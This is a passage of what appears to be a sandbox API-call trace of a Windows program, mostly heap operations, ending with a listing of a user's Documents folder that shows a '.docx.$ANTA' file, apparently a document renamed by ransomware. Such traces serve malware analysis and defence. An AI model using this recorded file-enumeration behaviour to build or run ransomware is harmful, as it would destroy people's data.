0x43c9d40 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.565] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0078.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x34) returned 0x41ac440 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.567] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.567] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.567] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.568] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.568] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.569] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.570] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.570] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0078.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.571] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfaf5c8ea, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfaf5c8ea, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca1d8, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0078.571] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfaf5c8ea, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfaf5c8ea, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca1d8, cFileName="..", cAlternateFileName="")) returned 1 [0078.571] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf919009b, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf919009b, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf92022d6, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x5a60, dwReserved0=0x0, dwReserved1=0x43ca1d8, cFileName="16hIz1 tYfBoIcwVhJi.docx.$ANTA", cAlternateFileName="16HIZ1~1.$AN")) returned 1 [0078.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.572] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.572] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.572] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.572] 